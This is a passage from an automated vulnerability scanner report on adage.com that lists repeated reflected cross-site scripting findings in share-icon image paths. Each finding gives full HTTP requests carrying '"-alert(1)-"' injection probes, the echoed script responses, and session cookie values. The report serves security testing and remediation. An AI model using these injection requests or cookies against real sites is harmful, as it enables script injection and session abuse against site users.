Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-linkedin.png56556"-alert(1)-"6b88251e67d?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=362CA96EB74BCDA656F3458E8FAA7FFE9022CEDF; path=/
Set-Cookie: HMAC=D2A70B3B6F2D627B1CF791FBD8AABF72580161D9; path=/
Set-Cookie: HMAC=56BE619682B95C7B39BA8A91499C3F25EAD08183; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-linkedin.png56556"-alert(1)-"6b88251e67d"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.28. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-netvibes.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9013f"-alert(1)-"1cee8c0ee9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images9013f"-alert(1)-"1cee8c0ee9f/save-and-share-icons/icon-netvibes.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=73D8C798EA35BDFF5FEF8D39C74DB99D5E721631; path=/
Set-Cookie: HMAC=25A02705D9075DDA484F5353B5F7C492E9483189; path=/
Set-Cookie: HMAC=554899B43EF275815F2646FADC65809B0EE347A9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images9013f"-alert(1)-"1cee8c0ee9f/save-and-share-icons/icon-netvibes.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.29. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-netvibes.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cd9a"-alert(1)-"4fcb73030b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons6cd9a"-alert(1)-"4fcb73030b2/icon-netvibes.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E342A8845C88713B81D977581A7D63D2FC7A20FB; path=/
Set-Cookie: HMAC=6B0E7D69E94126D64D3329417CBF65F22F2BDC11; path=/
Set-Cookie: HMAC=80B3B97FE86F7CDC9AC18C9FD7380AEE9F1A95F9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons6cd9a"-alert(1)-"4fcb73030b2/icon-netvibes.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.30. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-netvibes.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f6b3"-alert(1)-"1ea28baa207 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-netvibes.png3f6b3"-alert(1)-"1ea28baa207?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=767783B193E8D0DC66969E1FB28E77E7AA6E6989; path=/
Set-Cookie: HMAC=08993BCCA5393E57413B92AD16F4FF78A91C2157; path=/
Set-Cookie: HMAC=94AEC6726A6669DEFD6DC09D3765DECC8CD48751; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-netvibes.png3f6b3"-alert(1)-"1ea28baa207"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.31. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-newsvine.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1928"-alert(1)-"498b288b29c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagesd1928"-alert(1)-"498b288b29c/save-and-share-icons/icon-newsvine.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BFF1773CBD1401331E38D3002E202A8EDCC8C2A6; path=/
Set-Cookie: HMAC=0949AB8D107D4BD432DE4289A29F5E47982AEBED; path=/
Set-Cookie: HMAC=11D331257740316F08989A9640AC8CB7B23DF935; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagesd1928"-alert(1)-"498b288b29c/save-and-share-icons/icon-newsvine.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.32. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-newsvine.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e3d7"-alert(1)-"cd5633629a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons9e3d7"-alert(1)-"cd5633629a9/icon-newsvine.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EE6BABB7E28048369428274FC9041746349D3CB7; path=/
Set-Cookie: HMAC=F1F02E5A35071CC4E1A19AAC9FA98441C3332201; path=/
Set-Cookie: HMAC=C7CBFAB5E1129988854DD5219C9FC26B0E00D705; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons9e3d7"-alert(1)-"cd5633629a9/icon-newsvine.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.33. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-newsvine.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93015"-alert(1)-"214765a46a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-newsvine.png93015"-alert(1)-"214765a46a2?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B909C3437866586FD17CD7C7280B4574F71AFAE6; path=/
Set-Cookie: HMAC=D4B1B00F32769F1F5BB9DC7EE43D6D6D3585CB7F; path=/
Set-Cookie: HMAC=68D1AF8AADFA2386BD43FEC50632177CA8E44BF3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-newsvine.png93015"-alert(1)-"214765a46a2"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.34. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-reddit.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62600"-alert(1)-"64c1d70f5ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images62600"-alert(1)-"64c1d70f5ee/save-and-share-icons/icon-reddit.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E53B256FC3646C8713A7559CDCA6504D5F107FAF; path=/
Set-Cookie: HMAC=9B2C2EF38120BE847E5996FFA47502EE868AB9D6; path=/
Set-Cookie: HMAC=667937EC16296BDABB46CB4BAC3A3F3DBC15F2C7; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images62600"-alert(1)-"64c1d70f5ee/save-and-share-icons/icon-reddit.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.35. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-reddit.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f62d4"-alert(1)-"b058ff9b208 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconsf62d4"-alert(1)-"b058ff9b208/icon-reddit.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=63AAEFC95E8AA1063B6F1566ED2B3871E3A95350; path=/
Set-Cookie: HMAC=60A52D5EC992DDBA9ADDAACFB8E133A339C01D87; path=/
Set-Cookie: HMAC=863B683D89A94AF284D78A58FBECF879D8CF3987; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconsf62d4"-alert(1)-"b058ff9b208/icon-reddit.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.36. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-reddit.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68891"-alert(1)-"8062c447371 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-reddit.png68891"-alert(1)-"8062c447371?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=02375A16C5DABCA9F1B8426F789E8C218D3C16A8; path=/
Set-Cookie: HMAC=09F8CFEC2A615A5C1648CE0DD39E150A722FF4DA; path=/
Set-Cookie: HMAC=891C51882C7388FAE7BD23AA3C1FEF291684577F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-reddit.png68891"-alert(1)-"8062c447371"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.37. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-stumbleupon.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23e81"-alert(1)-"624d2126b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images23e81"-alert(1)-"624d2126b2f/save-and-share-icons/icon-stumbleupon.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5F8D65ABDF28B4A2E17E72191E969F212A7E331F; path=/
Set-Cookie: HMAC=ADCE4AD4408BBA2FA183B5C22DBBDC199485F2AB; path=/
Set-Cookie: HMAC=CA185B63667609BA6ABB91FE024606DF9473F7D7; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
